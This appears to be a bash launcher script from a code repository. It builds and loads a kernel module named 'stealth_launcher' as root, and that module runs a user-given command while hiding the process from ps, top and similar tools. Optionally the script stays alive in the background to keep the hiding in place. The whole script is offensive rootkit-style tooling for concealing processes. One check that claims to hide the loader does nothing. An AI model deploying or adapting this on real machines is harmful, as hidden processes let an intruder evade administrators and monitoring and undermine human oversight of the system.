blob: 04bd5bf6ef481e4db460df88ce4a7518013a09bb (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
|
#!/bin/bash
# run_stealth.sh - Helper script to run commands with process hiding
# Usage: ./run_stealth.sh -c "sleep 120" -p "sleep"
# Default values
STEALTH_CMD=""
HIDE_PATTERN=""
AUTO_CLEANUP=1
# Parse command line arguments
while [[ $# -gt 0 ]]; do
case $1 in
-c|--command)
STEALTH_CMD="$2"
shift 2
;;
-p|--pattern)
HIDE_PATTERN="$2"
shift 2
;;
-a|--auto-cleanup)
AUTO_CLEANUP="$2"
shift 2
;;
*)
# For backward compatibility
if [ -z "$STEALTH_CMD" ]; then
STEALTH_CMD="$1"
fi
shift
;;
esac
done
# Check if any command was provided
if [ -z "$STEALTH_CMD" ]; then
echo "Usage: $0 -c \"command to run in stealth mode\" [-p \"pattern to hide\"] [-a 0|1]"
echo "Example: $0 -c \"sleep 120\" -p \"sleep\""
echo " -a 1 Enable auto-cleanup (default)"
echo " -a 0 Disable auto-cleanup"
echo " or: $0 \"command to run in stealth mode\" (backward compatibility)"
exit 1
fi
# Check if user is root
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
# Build the kernel module if it's not already built
if [ ! -f "stealth_launcher.ko" ]; then
echo "Building kernel module..."
make stealth_launcher.ko >/dev/null 2>&1
if [ $? -ne 0 ]; then
echo "Failed to build the kernel module"
exit 1
fi
fi
# Remove any existing module first
if lsmod | grep -q "stealth_launcher"; then
echo "Removing existing stealth_launcher module..."
rmmod stealth_launcher >/dev/null 2>&1
fi
# Prepare module parameters (with proper escaping)
MODULE_PARAMS=""
# Escape special characters in the command
ESCAPED_CMD=$(echo "$STEALTH_CMD" | sed 's/"/\\"/g')
MODULE_PARAMS="target_cmd=\"$ESCAPED_CMD\""
# Add hide pattern if specified
if [ -n "$HIDE_PATTERN" ]; then
ESCAPED_PATTERN=$(echo "$HIDE_PATTERN" | sed 's/"/\\"/g')
MODULE_PARAMS="$MODULE_PARAMS hide_pattern=\"$ESCAPED_PATTERN\""
fi
# Add auto-cleanup parameter
MODULE_PARAMS="$MODULE_PARAMS auto_cleanup=$AUTO_CLEANUP"
# Hide module and insmod process to avoid showing in ps/top
if ! echo 1 > /dev/null; then
echo "Hiding module loader processes disabled"
fi
# Load the kernel module with the parameters
echo "Loading stealth_launcher with parameters: $MODULE_PARAMS"
echo "Auto-cleanup mode: $([ "$AUTO_CLEANUP" -eq 1 ] && echo "enabled" || echo "disabled")"
insmod stealth_launcher.ko $MODULE_PARAMS >/dev/null 2>&1
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "Command launched in stealth mode"
echo "Process will be hidden from ps, top, and other tools"
if [ "$AUTO_CLEANUP" -eq 1 ]; then
echo "Module will automatically unload when process completes"
else
echo "To unhide processes, run: rmmod stealth_launcher"
fi
# If auto-cleanup is disabled, we need to keep the script running
if [ "$AUTO_CLEANUP" -eq 0 ]; then
# Wait quietly to keep stealth script running
sleep 1
# In background mode
exec > /dev/null 2>&1
# Keep script running to maintain stealth chain
tail -f /dev/null
fi
else
echo "Failed to load module. Check kernel log for details."
echo "Try dmesg | tail"
exit 1
fi
exit 0
|
